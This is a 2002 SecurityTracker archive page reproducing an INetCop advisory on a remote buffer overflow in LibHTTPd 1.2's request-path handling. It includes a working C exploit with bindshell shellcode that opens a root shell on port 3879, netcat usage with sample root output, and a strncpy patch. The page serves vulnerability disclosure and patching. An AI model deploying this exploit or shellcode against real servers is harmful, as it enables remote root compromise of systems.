SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Web Server/CGI)  >   LibHTTPd Vendors:   Hughes Technologies Pty Ltd.
LibHTTPd Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1005624
SecurityTracker URL:  http://securitytracker.com/id/1005624
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 14 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.2
Description:   A buffer overflow vulnerability was reported in LibHTTPd. A remote user can execute arbitrary code with the privileges of the server using LibHTTPd.

INetCop Security reported that a buffer overflow exists in 'api.c', where user-supplied data (the URL request path) is copied into a fixed length buffer without checking the size of the data prior to the copy.

A demonstration exploit script is provided in the Source Message.
Impact:   A remote user can execute arbitrary code on the server with the privileges of the daemon that uses LibHTTPd.
Solution:   No solution was available at the time of this entry. The author has provided an unofficial patch, available in the Source Message.
Vendor URL:  www.hughes.com.au/products/libhttpd/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents
Date:  Wed, 13 Nov 2002 17:42:00 +0800
Subject:  Remote Buffer Overflow vulnerability in Lib HTTPd.




	========================================
	INetCop Security Advisory #2002-0x82-003
	========================================


* Title: Remote Buffer Overflow vulnerability in Lib HTTPd.


0x01. Description


LibHTTPD can be used to add basic web server capabilities to an application or embedded device. 
Detailed contents desire to reference lower part homepage. :-)

If examine 'api.c' of library libhttpd.a source code, can find vulnerability.
Can see httpdProcessRequest() in line:860

   __
   860  void httpdProcessRequest(server)
   861          httpd   *server;
   862  {
   863          char    dirName[HTTP_MAX_URL],
        ...
   869          server->response.responseLength = 0;
   870          strcpy(dirName, httpdRequestPath(server)); // here.
   --

Herewith, fatal vulnerability that can execute rootshell in remote happens.


0x02. Vulnerable Packages


Vendor site: http://www.hughes.com.au/products/libhttpd/

libhttpd-1.2 
-libhttpd-1.2.tar.gz
+Linux
+Other


0x03. Exploit


This's exploit code that prove.
Through remote attack, get 'root' competence.

Use netcat for very easy exploit.

To do simple explanation about exploit.
Through POST, insert much &shellcode address.
Put next nop,shellcode.
(Port:3879 bindshell code)


=== 0x82-Remote.libhttpdxpl.c ===

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
**                             by Xpl017Elz 
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$ 
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{ 
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
	"\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
	"\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
    	"\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
	"\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
	"\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
	"\377\377/bin/sh";
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {/* rEDhAT Default: 0x804e482,
	Debian Address? */
	fprintf(stdout,"\202\344\004\b");
    }
    fprintf(stdout,"\r\n");
    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {/* SSSSSSSS...SSSSSSSSS;;; */
	fprintf(stdout,"S");
    }
    fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
}

=== eof ===


0x04. Patch


=== api.patch ===

--- api.c       Sat Nov  9 20:06:30 2002
+++ api.patch.c Sat Nov  9 20:05:33 2002
@@ -867,7 +867,7 @@
	httpContent *entry;
 
	server->response.responseLength = 0;
-	strcpy(dirName, httpdRequestPath(server));
+	strncpy(dirName, httpdRequestPath(server), HTTP_MAX_URL);
	cp = rindex(dirName, '/');
	if (cp == NULL)
	{

=== eof ===


P.S: Sorry, for my poor english.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
             My World: http://x82.i21c.net

GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--


-- 
Get your free email from http://www.hackermail.com

Powered by Outblaze


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC